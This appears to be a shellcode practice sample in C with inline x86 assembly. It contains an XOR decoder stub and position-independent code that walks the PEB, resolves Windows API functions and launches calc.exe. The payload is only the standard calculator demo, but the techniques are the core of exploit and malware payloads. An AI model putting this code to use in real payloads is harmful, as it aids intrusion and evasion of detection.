void __declspec(naked)ClearZero() { __asm{ jmp _END1; _Next: pop ebx; dec ebx; xor ecx, ecx; mov cl, 0xC7; _LoopStart: xor byte ptr[ebx + ecx], 0x11; loop _LoopStart; jmp _ShellCodeStart; _END1: call _Next; // 开始执行真正的shellCode _ShellCodeStart: int 3; } } void __declspec(naked) ExecuteCalc() { __asm{ mov eax,fs:[0x30] mov eax,[eax+0xc] mov esi,[eax+0x1c] lodsd mov eax,[eax+0x8] mov ebp,eax mov eax,[ebp+0x3c] mov edx,[ebp+eax+0x78] add edx,ebp mov ecx,[edx+0x18] mov ebx,[edx+0x20] add ebx,ebp search: dec ecx mov esi,[ebx+ecx*4] add esi,ebp mov eax,0x50746547 cmp [esi],eax jne search mov eax,0x41636f72 cmp [esi+4],eax jne search mov eax,0x41636f72 cmp [esi+4],eax jne search mov ebx,[edx+0x24] add ebx,ebp mov cx,[ebx+ecx*2] mov ebx,[edx+0x1c] add ebx,ebp mov eax,[ebx+ecx*4] add eax,ebp mov edi,ebp push ebp sub esp,0x50 mov ebp,esp mov [ebp+0x40],eax // GetProcAddress push 0 push 0x41797261 push 0x7262694C push 0x64616F4C push esp push edi call [ebp+0x40] // GetProcAddress(..., "LoadLibraryA") mov [ebp+0x44],eax // LoadLibraryA push 0x737365 push 0x636F7250 push 0x74697845 push esp push edi call [ebp+0x40] // GetProcAddress(..., "ExitProcess") mov [ebp+0x4],eax // ExitProcess push 0x636578 push 0x456E6957 push esp push edi call [ebp+0x40] // GetProcAddress(..., "WinExec") mov edi,eax mov dword ptr[ebp+0x10],0x636C6163 mov dword ptr[ebp+0x14],0x6578652E mov dword ptr[ebp+0x18],0 push 5 lea eax,[ebp+0x10] push eax call edi // WinExec("calc.exe", SW_SHOW) push 0; call [ebp + 0x04]; // ExitPorcess(0) } // WinExec("calc.exe", SW_SHOW); // ShellExecuteA(NULL, "open", "calc.exe", NULL, NULL, SW_SHOWNORMAL); }